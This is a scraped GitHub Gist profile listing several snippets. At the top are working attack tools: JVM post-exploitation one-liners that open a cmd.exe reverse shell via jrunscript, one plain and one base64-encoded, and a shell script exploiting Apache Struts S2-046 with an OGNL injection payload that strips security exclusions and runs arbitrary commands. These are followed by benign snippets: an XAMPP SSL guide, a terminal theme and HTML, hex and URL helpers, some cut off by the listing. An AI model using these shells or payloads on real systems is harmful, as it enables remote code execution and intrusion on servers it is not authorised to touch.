Skip to content

Instantly share code, notes, and snippets.

View nuryslyrt's full-sized avatar
🌟
Discover Stars!

Nur Gucu nuryslyrt

🌟
Discover Stars!
168 followers · 243 following
View GitHub Profile
@nuryslyrt
nuryslyrt / JVM_POST_EXPLOIT.md
Created October 14, 2017 23:21 — forked from frohoff/JVM_POST_EXPLOIT.md
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@nuryslyrt
nuryslyrt / S2-046exploit.sh
Created October 14, 2017 23:19
Shell Script For Apache Struts S2-046 Vulnerability
#!/bin/bash
url="http://domain.com:8080/nur-struts2-showcase-2.3.12/showcase.action"
cmd="nslookup S2-046check.7b11825b49ac31c31a3f.d.zhack.ca"
shift
shift
boundary="---------------------------735323031399963166993862150"
content_type="multipart/form-data; boundary=$boundary"
payload=$(echo "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"$cmd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(
@nuryslyrt
nuryslyrt / SSLXampp.md
Created October 5, 2017 10:43 — forked from nguyenanhtu/SSLXampp.md
Guide to configure SSL in XAMPP for Windows

How to test 'https' in XAMPP for localhost ? I will guide you

Menu

  • Create certificate
  • Config Apache to access https instead of http
  • Config mod rewrite to generate SSL url
  • Config Virtual host to test site

Step 1 : Create certificate

  • Go to your XAMPP installation directory (in my case it’s E:\xampp), figure out apache folder. In this, find & run batch file
@nuryslyrt
nuryslyrt / iterm2-solarized.md
Created October 4, 2017 11:51 — forked from kevin-smets/iterm2-solarized.md
iTerm2 + Oh My Zsh + Solarized color scheme + Meslo powerline font + [Powerlevel9k] - (macOS)

Default

Default

Powerlevel9k

Powerlevel9k

@nuryslyrt
nuryslyrt / quickHTMLCleaning.py
Last active July 19, 2017 15:53
#!/usr/bin/env python
#Regex Example:
import re
def cleanhtml(raw_html):
cleanr = re.compile('<.*?>')
cleantext = re.sub(cleanr, '', raw_html)
return cleantext
@nuryslyrt
nuryslyrt / hexEncoder.java
Created July 19, 2017 14:25
Hex Encoding for String in \x format
public static String hexEncode(String input) {
String out = "";
for (char c : input.toCharArray()) {
out += "\\x" + String.format("%x", new BigInteger(1, input.getBytes(/YOUR_CHARSET?/)));
}
return out;
}
@nuryslyrt
nuryslyrt / PythonHexEncodeBestPractice.txt
Created July 19, 2017 14:11
In Python 3 you can't call encode() on 8-bit strings anymore, so the hex codec became pointless and was removed.
Although you theoretically could have a hex codec and use it like this:
>>> import codecs
>>> hexlify = codecs.getencoder('hex')
>>> hexlify(b'Blaah')[0]
b'426c616168'
Using binascii is easier and nicer:
@nuryslyrt
nuryslyrt / urlValidator.java
Created July 19, 2017 14:02
Two options for url validating
/***
First Option:
--------------
***/
public static void main(String[] args) {
try{
String test = "http://netsparker.com";
System.out.println(test.matches("^(http|https)://.*$"));
} finally{
@nuryslyrt
nuryslyrt / anchorTagValidator.java
Created July 18, 2017 16:14
import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class AnchorTagValidator{
private Pattern pattern;
private Matcher matcher;
private static final String HTML_TAG_PATTERN = "<a(?=\s|>)(?!(?:[^>=]|=(['"])(?:(?!\1).)*\1)*?\shref=['"])[^>]*>.*?<\/a>";
@nuryslyrt
nuryslyrt / htmlTagRemover.py
Created July 18, 2017 15:35
from bs4 import BeautifulSoup
# remove all attributes
def _remove_all_attrs(soup):
for tag in soup.find_all(True):
tag.attrs = {}
return soup
# remove all attributes except some tags
def _remove_all_attrs_except(soup):